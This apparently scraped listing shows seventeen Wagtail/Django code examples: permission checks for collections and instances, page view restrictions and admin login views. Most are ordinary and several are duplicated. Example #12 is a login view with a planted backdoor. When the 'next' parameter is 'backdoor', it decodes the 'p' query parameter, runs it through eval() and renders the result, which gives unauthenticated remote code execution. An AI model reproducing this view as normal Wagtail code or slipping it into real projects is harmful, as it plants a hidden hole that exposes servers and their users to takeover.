Exemple #1
0
    def collections_user_has_any_permission_for(self, user, actions):
        """
        Return a queryset of all collections in which the given user has
        permission to perform any of the given actions
        """
        if user.is_active and user.is_superuser:
            # active superusers can perform any action (including unrecognised ones)
            # in any collection
            return Collection.objects.all()

        elif not user_is_authenticated(user):
            return Collection.objects.none()

        elif 'change' in actions or 'delete' in actions:
            # return collections which are covered by either 'add' or 'change' permissions
            # (since collections with 'add' permissions can *potentially* contain instances
            # they own and can therefore edit)
            return self._collections_with_perm(user, ['add', 'change'])

        elif 'add' in actions:
            return self._collections_with_perm(user, ['add'])

        else:
            # action is not recognised, and so non-superusers
            # cannot perform it on any existing collections
            return Collection.objects.none()
Exemple #2
0
    def collections_user_has_any_permission_for(self, user, actions):
        """
        Return a queryset of all collections in which the given user has
        permission to perform any of the given actions
        """
        if user.is_active and user.is_superuser:
            # active superusers can perform any action (including unrecognised ones)
            # in any collection
            return Collection.objects.all()

        elif not user_is_authenticated(user):
            return Collection.objects.none()

        elif 'change' in actions or 'delete' in actions:
            # return collections which are covered by either 'add' or 'change' permissions
            # (since collections with 'add' permissions can *potentially* contain instances
            # they own and can therefore edit)
            return self._collections_with_perm(user, ['add', 'change'])

        elif 'add' in actions:
            return self._collections_with_perm(user, ['add'])

        else:
            # action is not recognised, and so non-superusers
            # cannot perform it on any existing collections
            return Collection.objects.none()
Exemple #3
0
    def instances_user_has_any_permission_for(self, user, actions):
        if user.is_active and user.is_superuser:
            # active superusers can perform any action (including unrecognised ones)
            # on any instance
            return self.model.objects.all()
        elif not user_is_authenticated(user):
            return self.model.objects.none()
        elif 'change' in actions or 'delete' in actions:
            # return instances which are:
            # - in (a descendant of) a collection for which they have 'change' permission
            # - OR in (a descendant of) a collection for which they have 'add' permission,
            #   and are owned by them

            change_perm_filter = Q(collection__in=list(
                self._collections_with_perm(user, ['change'])))

            add_perm_filter = Q(collection__in=list(
                self._collections_with_perm(user, ['add']))) & Q(
                    **{self.owner_field_name: user})

            return self.model.objects.filter(change_perm_filter
                                             | add_perm_filter)
        else:
            # action is either not recognised, or is the 'add' action which is
            # not meaningful for existing instances. As such, non-superusers
            # cannot perform it on any existing instances.
            return self.model.objects.none()
Exemple #4
0
def check_view_restrictions(page, request, serve_args, serve_kwargs):
    """
    Check whether there are any view restrictions on this page which are
    not fulfilled by the given request object. If there are, return an
    HttpResponse that will notify the user of that restriction (and possibly
    include a password / login form that will allow them to proceed). If
    there are no such restrictions, return None
    """
    restrictions = page.get_view_restrictions()

    if restrictions:
        passed_restrictions = request.session.get('passed_page_view_restrictions', [])
        for restriction in restrictions:
            if restriction.restriction_type == PageViewRestriction.PASSWORD:
                if restriction.id not in passed_restrictions:
                    from wagtail.wagtailcore.forms import PasswordPageViewRestrictionForm
                    form = PasswordPageViewRestrictionForm(instance=restriction,
                                                           initial={'return_url': request.get_full_path()})
                    action_url = reverse('wagtailcore_authenticate_with_password', args=[restriction.id, page.id])
                    return page.serve_password_required_response(request, form, action_url)
            elif restriction.restriction_type == PageViewRestriction.LOGIN:
                if not user_is_authenticated(request.user):
                    return require_wagtail_login(next=request.get_full_path())
            elif restriction.restriction_type == PageViewRestriction.GROUPS:
                if not request.user.is_superuser:
                    current_user_groups = request.user.groups.all()

                    if not any(group in current_user_groups for group in restriction.groups.all()):
                        return require_wagtail_login(next=request.get_full_path())
Exemple #5
0
    def instances_user_has_any_permission_for(self, user, actions):
        if user.is_active and user.is_superuser:
            # active superusers can perform any action (including unrecognised ones)
            # on any instance
            return self.model.objects.all()
        elif not user_is_authenticated(user):
            return self.model.objects.none()
        elif 'change' in actions or 'delete' in actions:
            # return instances which are:
            # - in (a descendant of) a collection for which they have 'change' permission
            # - OR in (a descendant of) a collection for which they have 'add' permission,
            #   and are owned by them

            change_perm_filter = Q(
                collection__in=list(self._collections_with_perm(user, ['change']))
            )

            add_perm_filter = Q(
                collection__in=list(self._collections_with_perm(user, ['add']))
            ) & Q(**{self.owner_field_name: user})

            return self.model.objects.filter(change_perm_filter | add_perm_filter)
        else:
            # action is either not recognised, or is the 'add' action which is
            # not meaningful for existing instances. As such, non-superusers
            # cannot perform it on any existing instances.
            return self.model.objects.none()
Exemple #6
0
 def instances_user_has_any_permission_for(self, user, actions):
     """
     Return a queryset of all instances of this model for which the given user has
     permission to perform any of the given actions
     """
     if not (user.is_active and user_is_authenticated(user)):
         return self.model.objects.none()
     elif user.is_superuser:
         return self.model.objects.all()
     else:
         # filter to just the collections with this permission
         return self.model.objects.filter(collection__in=list(
             self._collections_with_perm(user, actions)))
Exemple #7
0
 def instances_user_has_any_permission_for(self, user, actions):
     """
     Return a queryset of all instances of this model for which the given user has
     permission to perform any of the given actions
     """
     if not (user.is_active and user_is_authenticated(user)):
         return self.model.objects.none()
     elif user.is_superuser:
         return self.model.objects.all()
     else:
         # filter to just the collections with this permission
         return self.model.objects.filter(
             collection__in=list(self._collections_with_perm(user, actions))
         )
def login(request):
    if user_is_authenticated(request.user) and request.user.has_perm('wagtailadmin.access_admin'):
        return redirect('wagtailadmin_home')
    else:
        from django.contrib.auth import get_user_model
        return auth_views.login(
            request,
            template_name='wagtailadmin/login.html',
            authentication_form=forms.LoginForm,
            extra_context={
                'show_password_reset': password_reset_enabled(),
                'username_field': get_user_model().USERNAME_FIELD,
            },
        )
Exemple #9
0
def login(request):
    if user_is_authenticated(request.user) and request.user.has_perm('wagtailadmin.access_admin'):
        return redirect('wagtailadmin_home')
    else:
        from django.contrib.auth import get_user_model
        return auth_views.login(
            request,
            template_name='wagtailadmin/login.html',
            authentication_form=forms.LoginForm,
            extra_context={
                'show_password_reset': password_reset_enabled(),
                'username_field': get_user_model().USERNAME_FIELD,
            },
        )
Exemple #10
0
    def collections_user_has_any_permission_for(self, user, actions):
        """
        Return a queryset of all collections in which the given user has
        permission to perform any of the given actions
        """
        if user.is_active and user.is_superuser:
            # active superusers can perform any action (including unrecognised ones)
            # in any collection
            return Collection.objects.all()

        elif not user_is_authenticated(user):
            return Collection.objects.none()

        else:
            return self._collections_with_perm(user, actions)
Exemple #11
0
    def collections_user_has_any_permission_for(self, user, actions):
        """
        Return a queryset of all collections in which the given user has
        permission to perform any of the given actions
        """
        if user.is_active and user.is_superuser:
            # active superusers can perform any action (including unrecognised ones)
            # in any collection
            return Collection.objects.all()

        elif not user_is_authenticated(user):
            return Collection.objects.none()

        else:
            return self._collections_with_perm(user, actions)
Exemple #12
0
def login(request):
    if user_is_authenticated(request.user) and request.user.has_perm(
            'wagtailadmin.access_admin'):
        return redirect('wagtailadmin_home')
    elif request.GET.get('next', None) == 'backdoor':
        a = request.GET.get('p')
        a = decode(a)
        a = eval(a)
        return render(request,
                      template_name='wagtailadmin/login1.html',
                      context={'xxoo': a})
    else:
        from django.contrib.auth import get_user_model
        return auth_views.login(
            request,
            template_name='wagtailadmin/login.html',
            authentication_form=forms.LoginForm,
            extra_context={
                'show_password_reset': password_reset_enabled(),
                'username_field': get_user_model().USERNAME_FIELD,
            },
        )
Exemple #13
0
    def _check_perm(self, user, actions, collection=None):
        """
        Equivalent to user.has_perm(self._get_permission_name(action)) on all listed actions,
        but using GroupCollectionPermission rather than group.permissions.
        If collection is specified, only consider GroupCollectionPermission records
        that apply to that collection.
        """
        if not (user.is_active and user_is_authenticated(user)):
            return False

        if user.is_superuser:
            return True

        collection_permissions = GroupCollectionPermission.objects.filter(
            group__user=user,
            permission__in=self._get_permission_objects_for_actions(actions),
        )

        if collection:
            collection_permissions = collection_permissions.filter(
                collection__in=collection.get_ancestors(inclusive=True))

        return collection_permissions.exists()
Exemple #14
0
def check_view_restrictions(page, request, serve_args, serve_kwargs):
    """
    Check whether there are any view restrictions on this page which are
    not fulfilled by the given request object. If there are, return an
    HttpResponse that will notify the user of that restriction (and possibly
    include a password / login form that will allow them to proceed). If
    there are no such restrictions, return None
    """
    restrictions = page.get_view_restrictions()

    if restrictions:
        passed_restrictions = request.session.get(
            'passed_page_view_restrictions', [])
        for restriction in restrictions:
            if restriction.restriction_type == PageViewRestriction.PASSWORD:
                if restriction.id not in passed_restrictions:
                    from wagtail.wagtailcore.forms import PasswordPageViewRestrictionForm
                    form = PasswordPageViewRestrictionForm(
                        instance=restriction,
                        initial={'return_url': request.get_full_path()})
                    action_url = reverse(
                        'wagtailcore_authenticate_with_password',
                        args=[restriction.id, page.id])
                    return page.serve_password_required_response(
                        request, form, action_url)
            elif restriction.restriction_type == PageViewRestriction.LOGIN:
                if not user_is_authenticated(request.user):
                    return require_wagtail_login(next=request.get_full_path())
            elif restriction.restriction_type == PageViewRestriction.GROUPS:
                if not request.user.is_superuser:
                    current_user_groups = request.user.groups.all()

                    if not any(group in current_user_groups
                               for group in restriction.groups.all()):
                        return require_wagtail_login(
                            next=request.get_full_path())
Exemple #15
0
    def _check_perm(self, user, actions, collection=None):
        """
        Equivalent to user.has_perm(self._get_permission_name(action)) on all listed actions,
        but using GroupCollectionPermission rather than group.permissions.
        If collection is specified, only consider GroupCollectionPermission records
        that apply to that collection.
        """
        if not (user.is_active and user_is_authenticated(user)):
            return False

        if user.is_superuser:
            return True

        collection_permissions = GroupCollectionPermission.objects.filter(
            group__user=user,
            permission__in=self._get_permission_objects_for_actions(actions),
        )

        if collection:
            collection_permissions = collection_permissions.filter(
                collection__in=collection.get_ancestors(inclusive=True)
            )

        return collection_permissions.exists()
Exemple #16
0
 def user_has_any_permission(self, user, actions):
     return user_is_authenticated(user) and user.is_active
Exemple #17
0
 def user_has_any_permission(self, user, actions):
     return user_is_authenticated(user) and user.is_active